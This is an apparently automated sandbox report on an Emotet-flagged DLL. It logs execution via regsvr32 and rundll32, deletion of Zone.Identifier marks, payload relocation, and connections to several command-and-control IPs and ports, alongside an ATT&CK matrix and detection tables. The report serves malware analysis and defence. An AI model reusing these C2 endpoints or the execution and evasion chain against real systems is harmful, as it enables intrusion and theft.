Source: C:\Windows\System32\svchost.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior

Source: 6xfFjxyRXf.dll	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
Source: 6xfFjxyRXf.dll	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
Source: 6xfFjxyRXf.dll	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
Source: 6xfFjxyRXf.dll	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
Source: 6xfFjxyRXf.dll	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata

Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 2_2_100116D0 push eax; ret	2_2_100116E4
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 2_2_100116D0 push eax; ret	2_2_1001170C
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 2_2_10011A8C push eax; ret	2_2_10011AAA
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 2_2_10012D1B push ecx; ret	2_2_10012D2B
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 2_2_04F6179E push ds; retf	2_2_04F6179F
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 2_2_04F610BB push ebx; ret	2_2_04F610C6
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_100116D0 push eax; ret	3_2_100116E4
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_100116D0 push eax; ret	3_2_1001170C
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_10011A8C push eax; ret	3_2_10011AAA
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_10012D1B push ecx; ret	3_2_10012D2B
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_00C210BB push ebx; ret	3_2_00C210C6
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_00C2179E push ds; retf	3_2_00C2179F

Source: C:\Windows\SysWOW64\regsvr32.exe

Code function: 2_2_10021590 LoadLibraryA,GetProcAddress,FreeLibrary,

2_2_10021590

Source: C:\Windows\System32\loaddll32.exe

Process created: C:\Windows\SysWOW64\regsvr32.exe regsvr32.exe /s C:\Users\user\Desktop\6xfFjxyRXf.dll

Source: C:\Windows\SysWOW64\regsvr32.exe

PE file moved: C:\Windows\SysWOW64\Nrzawqzutwib\qenu.dlv

Jump to behavior

Hooking and other Techniques for Hiding and Protection

Hides that the sample has been downloaded from the Internet (zone.identifier)

Source: C:\Windows\SysWOW64\regsvr32.exe	File opened: C:\Windows\SysWOW64\Nrzawqzutwib\qenu.dlv:Zone.Identifier read attributes \| delete	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	File opened: C:\Windows\SysWOW64\Ydixzzwmsfkx\nuzdumx.iuq:Zone.Identifier read attributes \| delete	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	File opened: C:\Windows\SysWOW64\Hzzrgo\lwtswlxa.yeh:Zone.Identifier read attributes \| delete	Jump to behavior

Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 2_2_10008124 IsIconic,GetWindowPlacement,GetWindowRect,	2_2_10008124
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 2_2_10005B60 IsIconic,SendMessageA,GetSystemMetrics,GetSystemMetrics,GetSystemMetrics,GetClientRect,DrawIcon,	2_2_10005B60
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_10008124 IsIconic,GetWindowPlacement,GetWindowRect,	3_2_10008124
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_10005B60 IsIconic,SendMessageA,GetSystemMetrics,GetSystemMetrics,GetSystemMetrics,GetClientRect,DrawIcon,	3_2_10005B60

Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Source: C:\Windows\System32\svchost.exe TID: 6220

Thread sleep time: -60000s >= -30000s

Jump to behavior

Source: C:\Windows\SysWOW64\regsvr32.exe	API coverage: 3.6 %
Source: C:\Windows\SysWOW64\rundll32.exe	API coverage: 3.6 %

Source: C:\Windows\SysWOW64\regsvr32.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Windows\SysWOW64\regsvr32.exe

Code function: 2_2_100114D8 VirtualQuery,GetSystemInfo,VirtualQuery,VirtualAlloc,VirtualProtect,

2_2_100114D8

Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 2_2_10023806 __EH_prolog,GetFullPathNameA,lstrcpynA,PathIsUNCA,GetVolumeInformationA,CharUpperA,FindFirstFileA,FindClose,lstrlenA,lstrcpyA,		2_2_10023806
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_10023806 __EH_prolog,GetFullPathNameA,lstrcpynA,PathIsUNCA,GetVolumeInformationA,CharUpperA,FindFirstFileA,FindClose,lstrlenA,lstrcpyA,		3_2_10023806

Source: C:\Windows\SysWOW64\regsvr32.exe	API call chain: ExitProcess graph end node			graph_2-24632
Source: C:\Windows\SysWOW64\rundll32.exe	API call chain: ExitProcess graph end node			graph_3-24601

Source: C:\Windows\SysWOW64\regsvr32.exe	File Volume queried: C:\ FullSizeInformation			Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	File Volume queried: C:\ FullSizeInformation			Jump to behavior

Source: svchost.exe, 0000000B.00000002.917163561.00000262FC402000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: HvHostWdiSystemHostScDeviceEnumWiaRpctrkwksAudioEndpointBuilderhidservdot3svcDsSvcfhsvcWPDBusEnumsvsvcwlansvcEmbeddedModeirmonSensorServicevmicvssNgcSvcsysmainDevQueryBrokerStorSvcvmickvpexchangevmicshutdownvmicguestinterfacevmicvmsessionNcbServiceNetmanDeviceAssociationServiceTabletInputServicePcaSvcIPxlatCfgSvcCscServiceUmRdpService
Source: svchost.exe, 0000000E.00000002.584271882.0000023F13AE8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000002.583807616.0000023F13A70000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000002.583910159.0000023F13A88000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: svchost.exe, 0000000B.00000002.917233832.00000262FC428000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll

Source: C:\Windows\SysWOW64\regsvr32.exe

Code function: 2_2_10021590 LoadLibraryA,GetProcAddress,FreeLibrary,

2_2_10021590

Source: C:\Windows\SysWOW64\regsvr32.exe

Code function: 2_2_10004BB0 GetNativeSystemInfo,GetProcessHeap,HeapAlloc,memcpy,

2_2_10004BB0

Source: C:\Windows\System32\loaddll32.exe

Process queried: DebugPort

Jump to behavior

Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 2_2_10018246 SetUnhandledExceptionFilter,	2_2_10018246
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 2_2_1001825A SetUnhandledExceptionFilter,	2_2_1001825A
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_10018246 SetUnhandledExceptionFilter,	3_2_10018246
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_1001825A SetUnhandledExceptionFilter,	3_2_1001825A

HIPS / PFW / Operating System Protection Evasion

System process connects to network (likely due to code injection or exploit)

Source: C:\Windows\SysWOW64\regsvr32.exe	Network Connect: 217.182.25.250 8080	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Network Connect: 51.91.76.89 8080	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Network Connect: 189.232.46.161 443	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Network Connect: 119.193.124.41 7080	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Network Connect: 216.120.236.62 8080	Jump to behavior

Source: C:\Windows\SysWOW64\cmd.exe

Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\6xfFjxyRXf.dll",#1

Jump to behavior

Source: C:\Windows\SysWOW64\regsvr32.exe	Queries volume information: C:\ VolumeInformation			Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Queries volume information: C:\ VolumeInformation			Jump to behavior

Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: lstrcpyA,LoadLibraryA,GetLocaleInfoA,	2_2_100268C5
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: GetLocaleInfoA,	2_2_10019AB4
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: GetThreadLocale,GetLocaleInfoA,GetACP,	2_2_10006D70
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: lstrcpyA,LoadLibraryA,GetLocaleInfoA,	3_2_100268C5
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: GetLocaleInfoA,	3_2_10019AB4
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: GetThreadLocale,GetLocaleInfoA,GetACP,	3_2_10006D70

Source: C:\Windows\SysWOW64\regsvr32.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Source: C:\Windows\SysWOW64\regsvr32.exe

Code function: 2_2_1001712C GetSystemTimeAsFileTime,GetCurrentProcessId,GetCurrentThreadId,GetTickCount,QueryPerformanceCounter,

2_2_1001712C

Source: C:\Windows\SysWOW64\regsvr32.exe

Code function: 2_2_10019164 __lock,_strlen,_strcat,_strncpy,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,WideCharToMultiByte,_strncpy,

2_2_10019164

Source: C:\Windows\SysWOW64\regsvr32.exe

Code function: 2_2_1002871E GetVersion,LoadCursorA,LoadCursorA,LoadCursorA,

2_2_1002871E

Stealing of Sensitive Information

Yara detected Emotet

Source: Yara match	File source: 2.2.regsvr32.exe.4f00000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.rundll32.exe.4680000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.rundll32.exe.46b0000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.regsvr32.exe.4480000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.regsvr32.exe.4f00000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.rundll32.exe.bf0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.rundll32.exe.4680000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.rundll32.exe.c20000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.regsvr32.exe.2b50000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.rundll32.exe.bf0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.regsvr32.exe.4f60000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.regsvr32.exe.2b50000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000003.00000002.406595295.0000000000BF0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.406684150.0000000000C21000.00000020.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.415134102.0000000004F61000.00000020.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.917544011.0000000002B50000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.406621589.00000000046B1000.00000020.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.917618972.0000000004481000.00000020.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.414918130.0000000004F00000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.406594585.0000000004680000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY

Mitre Att&ck Matrix

Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Exfiltration	Command and Control	Network Effects	Remote Service Effects	Impact
Valid Accounts	1 Native API	1 DLL Side-Loading	111 Process Injection	2 Masquerading	2 Input Capture	2 System Time Discovery	Remote Services	2 Input Capture	Exfiltration Over Other Network Medium	12 Encrypted Channel	Eavesdrop on Insecure Network Communication	Remotely Track Device Without Authorization	Modify System Partition
Default Accounts	Scheduled Task/Job	Boot or Logon Initialization Scripts	1 DLL Side-Loading	2 Virtualization/Sandbox Evasion	LSASS Memory	21 Security Software Discovery	Remote Desktop Protocol	1 Archive Collected Data	Exfiltration Over Bluetooth	1 Non-Standard Port	Exploit SS7 to Redirect Phone Calls/SMS	Remotely Wipe Data Without Authorization	Device Lockout
Domain Accounts	At (Linux)	Logon Script (Windows)	Logon Script (Windows)	111 Process Injection	Security Account Manager	2 Virtualization/Sandbox Evasion	SMB/Windows Admin Shares	Data from Network Shared Drive	Automated Exfiltration	11 Application Layer Protocol	Exploit SS7 to Track Device Location	Obtain Device Cloud Backups	Delete Device Data
Local Accounts	At (Windows)	Logon Script (Mac)	Logon Script (Mac)	1 Deobfuscate/Decode Files or Information	NTDS	2 Process Discovery	Distributed Component Object Model	Input Capture	Scheduled Transfer	Protocol Impersonation	SIM Card Swap		Carrier Billing Fraud
Cloud Accounts	Cron	Network Logon Script	Network Logon Script	1 Hidden Files and Directories	LSA Secrets	1 Application Window Discovery	SSH	Keylogging	Data Transfer Size Limits	Fallback Channels	Manipulate Device Communication		Manipulate App Store Rankings or Ratings
Replication Through Removable Media	Launchd	Rc.common	Rc.common	2 Obfuscated Files or Information	Cached Domain Credentials	1 Remote System Discovery	VNC	GUI Input Capture	Exfiltration Over C2 Channel	Multiband Communication	Jamming or Denial of Service		Abuse Accessibility Features
External Remote Services	Scheduled Task	Startup Items	Startup Items	1 Regsvr32	DCSync	2 File and Directory Discovery	Windows Remote Management	Web Portal Capture	Exfiltration Over Alternative Protocol	Commonly Used Port	Rogue Wi-Fi Access Points		Data Encrypted for Impact
Drive-by Compromise	Command and Scripting Interpreter	Scheduled Task/Job	Scheduled Task/Job	1 Rundll32	Proc Filesystem	26 System Information Discovery	Shared Webroot	Credential API Hooking	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Application Layer Protocol	Downgrade to Insecure Protocols		Generate Fraudulent Advertising Revenue
Exploit Public-Facing Application	PowerShell	At (Linux)	At (Linux)	1 DLL Side-Loading	/etc/passwd and /etc/shadow	System Network Connections Discovery	Software Deployment Tools	Data Staged	Exfiltration Over Asymmetric Encrypted Non-C2 Protocol	Web Protocols	Rogue Cellular Base Station		Data Destruction
Supply Chain Compromise	AppleScript	At (Windows)	At (Windows)	1 File Deletion	Network Sniffing	Process Discovery	Taint Shared Content	Local Data Staging	Exfiltration Over Unencrypted/Obfuscated Non-C2 Protocol	File Transfer Protocols			Data Encrypted for Impact

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Source	Detection	Scanner	Label	Link
6xfFjxyRXf.dll	70%	Virustotal		Browse
6xfFjxyRXf.dll	100%	Joe Sandbox ML

Dropped Files

⊘No Antivirus matches

Unpacked PE Files

Source	Detection	Scanner	Label	Download
4.2.rundll32.exe.4680000.0.unpack	100%	Avira	HEUR/AGEN.1215461	Download File
2.2.regsvr32.exe.4f00000.0.unpack	100%	Avira	HEUR/AGEN.1215461	Download File
3.2.rundll32.exe.c20000.1.unpack	100%	Avira	TR/Crypt.XPACK.Gen	Download File
5.2.regsvr32.exe.4480000.1.unpack	100%	Avira	TR/Crypt.XPACK.Gen	Download File
2.2.regsvr32.exe.4f60000.1.unpack	100%	Avira	TR/Crypt.XPACK.Gen	Download File
4.2.rundll32.exe.46b0000.1.unpack	100%	Avira	TR/Crypt.XPACK.Gen	Download File
5.2.regsvr32.exe.2b50000.0.unpack	100%	Avira	HEUR/AGEN.1215461	Download File
3.2.rundll32.exe.bf0000.0.unpack	100%	Avira	HEUR/AGEN.1215461	Download File

Domains

⊘No Antivirus matches

URLs

Source	Detection	Scanner	Label
https://www.disneyplus.com/legal/your-california-privacy-rights	0%	URL Reputation	safe
https://www.disneyplus.com/legal/privacy-policy	0%	URL Reputation	safe
http://help.disneyplus.com.	0%	URL Reputation	safe
https://www.pango.co/privacy	0%	URL Reputation	safe
https://disneyplus.com/legal.	0%	URL Reputation	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
c-0001.c-msedge.net	13.107.4.50	true	false		unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
https://www.disneyplus.com/legal/your-california-privacy-rights	svchost.exe, 0000000E.00000003.571353182.0000023F14388000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://www.disneyplus.com/legal/privacy-policy	svchost.exe, 0000000E.00000003.571353182.0000023F14388000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://help.disneyplus.com.	svchost.exe, 0000000E.00000003.571353182.0000023F14388000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://support.hotspotshield.com/	svchost.exe, 0000000E.00000003.565704127.0000023F14819000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000003.564883544.0000023F14388000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000003.564185932.0000023F143AA000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000003.565394424.0000023F143AA000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000003.564280175.0000023F14802000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000003.564163015.0000023F1439A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000003.564576094.0000023F14803000.00000004.00000020.00020000.00000000.sdmp	false		high
https://www.hotspotshield.com/terms/	svchost.exe, 0000000E.00000003.565704127.0000023F14819000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000003.564883544.0000023F14388000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000003.564185932.0000023F143AA000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000003.565394424.0000023F143AA000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000003.564280175.0000023F14802000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000003.564163015.0000023F1439A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000003.564576094.0000023F14803000.00000004.00000020.00020000.00000000.sdmp	false		high
https://www.pango.co/privacy	svchost.exe, 0000000E.00000003.565704127.0000023F14819000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000003.564883544.0000023F14388000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000003.564185932.0000023F143AA000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000003.565394424.0000023F143AA000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000003.564280175.0000023F14802000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000003.564163015.0000023F1439A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000003.564576094.0000023F14803000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://disneyplus.com/legal.	svchost.exe, 0000000E.00000003.571353182.0000023F14388000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
217.182.25.250	unknown	France	16276	OVHFR	true
160.4.0.0	unknown	New Zealand	715	WOODYNET-2US	true
180.4.0.0	unknown	Japan	4713	OCNNTTCommunicationsCorporationJP	true
235.253.2.0	unknown	Reserved	unknown	unknown	true
249.253.2.0	unknown	Reserved	unknown	unknown	true
32.76.231.4	unknown	United States	2686	ATGS-MMD-ASUS	true
246.178.3.0	unknown	Reserved	unknown	unknown	true
184.134.163.2	unknown	United States	5778	CENTURYLINK-LEGACY-EMBARQ-RCMTUS	true
136.86.171.2	unknown	United States	60311	ONEFMCH	true
208.146.163.2	unknown	United States	3561	CENTURYLINK-LEGACY-SAVVISUS	true
116.4.0.0	unknown	China	4134	CHINANET-BACKBONENo31Jin-rongStreetCN	true
92.179.3.0	unknown	France	12479	UNI2-ASES	true
189.232.46.161	unknown	Mexico	8151	UninetSAdeCVMX	true
245.253.2.0	unknown	Reserved	unknown	unknown	true
148.4.0.0	unknown	United States	6074	LIUNETUS	true
94.179.3.0	unknown	Ukraine	6849	UKRTELNETUA	true
192.16.0.0	unknown	United States	14153	EDGECAST-IRUS	true
208.60.169.2	unknown	United States	6389	BELLSOUTH-NET-BLKUS	true
176.4.0.0	unknown	Germany	12638	AS12638DuesseldorfDE	true
128.4.0.0	unknown	United States	2	UDEL-DCNUS	true
243.253.2.0	unknown	Reserved	unknown	unknown	true
232.22.167.2	unknown	Reserved	unknown	unknown	true
195.194.0.0	unknown	United Kingdom	786	JANETJiscServicesLimitedGB	true
241.253.2.0	unknown	Reserved	unknown	unknown	true
144.23.167.2	unknown	Costa Rica	64102	OracleCorporationCR	true
255.178.3.0	unknown	Reserved	unknown	unknown	true
51.91.76.89	unknown	France	16276	OVHFR	true
24.149.166.2	unknown	United States	11025	COMCAST-HOUSTONUS	true
28.188.226.4	unknown	United States	7922	COMCAST-7922US	true
124.4.0.0	unknown	India	18302	SKG_NW-AS-KRSKTelecomKR	true
164.4.0.0	unknown	Sweden	44013	SANDVIK-ASSE	true
250.178.3.0	unknown	Reserved	unknown	unknown	true
119.193.124.41	unknown	Korea Republic of	4766	KIXS-AS-KRKoreaTelecomKR	true
216.120.236.62	unknown	United States	23535	HOSTROCKETUS	true
112.135.213.118	unknown	Sri Lanka	9329	SLTINT-AS-APSriLankaTelecomInternetLK	true
192.141.163.2	unknown	Brazil	267489	NEOVEXCOMERCIOESERVICOSDETELECOMUNICACOESBR	true

Private

IP
192.168.2.1

General Information

Joe Sandbox Version:	35.0.0 Citrine
Analysis ID:	669376
Start date and time: 20/07/202201:10:42	2022-07-20 01:10:42 +02:00
Joe Sandbox Product:	CloudBasic
Overall analysis duration:	0h 11m 37s
Hypervisor based Inspection enabled:	false
Report type:	full
Sample file name:	6xfFjxyRXf (renamed file extension from none to dll)
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
Number of analysed new started processes analysed:	24
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled HDC enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Detection:	MAL
Classification:	mal92.troj.evad.winDLL@18/2@0/37
EGA Information:	Successful, ratio: 100%
HDC Information:	Successful, ratio: 44% (good quality ratio 42.4%) Quality average: 81.3% Quality standard deviation: 25.2%
HCA Information:	Successful, ratio: 100% Number of executed functions: 69 Number of non-executed functions: 314
Cookbook Comments:	Adjust boot time Enable AMSI Override analysis time to 240s for rundll32

Warnings

Exclude process from analysis (whitelisted): MpCmdRun.exe, audiodg.exe, BackgroundTransferHost.exe, RuntimeBroker.exe, WMIADAP.exe, conhost.exe, backgroundTaskHost.exe, wuapihost.exe
Excluded IPs from analysis (whitelisted): 20.40.136.238, 20.223.24.244, 8.241.126.121, 8.248.137.254, 67.26.75.254, 8.238.85.126, 8.248.131.254
Excluded domains from analysis (whitelisted): www.bing.com, client.wns.windows.com, iris-de-prod-azsc-frc-b.francecentral.cloudapp.azure.com, fg.download.windowsupdate.com.c.footprint.net, displaycatalog-rp-europe.md.mp.microsoft.com.akadns.net, neu-displaycatalogrp.frontdoor.bigcatalog.commerce.microsoft.com, ctldl.windowsupdate.com, arc.msn.com, wu-bg-shim.trafficmanager.net, ris.api.iris.microsoft.com, consumer-displaycatalogrp-aks2aks-europe.md.mp.microsoft.com.akadns.net, store-images.s-microsoft.com, login.live.com, sls.update.microsoft.com, arc.trafficmanager.net, displaycatalog.mp.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, displaycatalog-rp.md.mp.microsoft.com.akadns.net
Not all processes where analyzed, report is missing behavior information
Report creation exceeded maximum time and may have missing disassembly code information.
Report size exceeded maximum capacity and may have missing behavior information.
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtProtectVirtualMemory calls found.
Report size getting too big, too many NtQueryValueKey calls found.

Simulations

Behavior and APIs

Time	Type	Description
01:13:15	API Interceptor	5x Sleep call for process: svchost.exe modified

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Link
217.182.25.250	9818t9ks1s.dll	Get hash	malicious	Browse
	uVPWqAOMKn.dll	Get hash	malicious	Browse
	CUfsVUDkr6.dll	Get hash	malicious	Browse
	psIFSn7VLi.dll	Get hash	malicious	Browse
	dhtylrVZ5y.dll	Get hash	malicious	Browse
	oAqFuoJ9ql.dll	Get hash	malicious	Browse
	MtsZNCJvMI.dll	Get hash	malicious	Browse
	ktrkyRZyaU.dll	Get hash	malicious	Browse
	l2sFDHB0lp.dll	Get hash	malicious	Browse
	h3CGwIXKW7.dll	Get hash	malicious	Browse
	FC6cLk6kKz.dll	Get hash	malicious	Browse
	ViiTOVGM74.dll	Get hash	malicious	Browse
	0xnQJ1y1YE.dll	Get hash	malicious	Browse
	ntn3NlNh90.dll	Get hash	malicious	Browse
	8u6naZBcZi.dll	Get hash	malicious	Browse
	z0zJ7pAKCQ.dll	Get hash	malicious	Browse
	6eeJ2fpp8m.dll	Get hash	malicious	Browse
	form.xlsm	Get hash	malicious	Browse
	f5f5.dll	Get hash	malicious	Browse
	4c96.dll	Get hash	malicious	Browse
180.4.0.0	bscHLGMyjW.dll	Get hash	malicious	Browse

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
c-0001.c-msedge.net	SecuriteInfo.com.Trojan.Packed2.44341.15154.exe	Get hash	malicious	Browse	13.107.4.50
	bLJR1tSMfo.dll	Get hash	malicious	Browse	13.107.4.50
	SecuriteInfo.com.Trojan.PackedNET.1449.13979.exe	Get hash	malicious	Browse	13.107.4.50
	2vMjDd8z34.dll	Get hash	malicious	Browse	13.107.4.50
	R78g1mgKDg.dll	Get hash	malicious	Browse	13.107.4.50
	YcbbEMLtwG.dll	Get hash	malicious	Browse	13.107.4.50
	http://krogerbeerevents.com	Get hash	malicious	Browse	13.107.4.50
	tYN8vfM4dv.dll	Get hash	malicious	Browse	13.107.4.50
	https://webdocsextcontrol.info/	Get hash	malicious	Browse	13.107.4.50
	102755.dll	Get hash	malicious	Browse	13.107.4.50
	SecuriteInfo.com.Exploit.Siggen3.34998.8568.xls	Get hash	malicious	Browse	13.107.4.50
	SecuriteInfo.com.Exploit.Siggen3.34998.30100.xls	Get hash	malicious	Browse	13.107.4.50
	SOA.exe	Get hash	malicious	Browse	13.107.4.50
	HebUwcQNfY.exe	Get hash	malicious	Browse	13.107.4.50
	http://www.pellainc8729.org	Get hash	malicious	Browse	13.107.4.50
	1i4WcYWthk.exe	Get hash	malicious	Browse	13.107.4.50
	dps6GhLM6K.dll	Get hash	malicious	Browse	13.107.4.50
	vFIcuFD2PD.dll	Get hash	malicious	Browse	13.107.4.50
	Company Profile- REMAES GmbH.doc	Get hash	malicious	Browse	13.107.4.50
	KVjthk8hIJ.exe	Get hash	malicious	Browse	13.107.4.50

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
WOODYNET-2US	xd.mips	Get hash	malicious	Browse	160.96.87.242
	ZG9zspc	Get hash	malicious	Browse	160.108.125.50
	mW6l0hEXP3	Get hash	malicious	Browse	160.108.150.52
	f6KrcRnK1b	Get hash	malicious	Browse	160.108.150.37
	iT6kZAEo4N	Get hash	malicious	Browse	160.108.150.37
	GXmhGiLuO8	Get hash	malicious	Browse	160.108.150.55
	MmEkRwqPt2	Get hash	malicious	Browse	160.100.160.205
	sora.arm	Get hash	malicious	Browse	160.108.197.254
	raRMTjkXAb	Get hash	malicious	Browse	160.110.53.18
	apep.arm7	Get hash	malicious	Browse	160.0.16.63
	sora.arm	Get hash	malicious	Browse	160.65.112.25
	sora.arm7	Get hash	malicious	Browse	160.110.28.85
	X0grZyIEGW	Get hash	malicious	Browse	160.65.32.190
	elmAKUWDRm	Get hash	malicious	Browse	160.64.44.150
	b3astmode.arm	Get hash	malicious	Browse	160.65.136.47
	3X5qPN65iQ	Get hash	malicious	Browse	160.110.53.11
	log017.arm-20220705-1050	Get hash	malicious	Browse	69.166.15.75
	jKira.x86_64	Get hash	malicious	Browse	160.4.232.148
	i686	Get hash	malicious	Browse	160.108.101.80
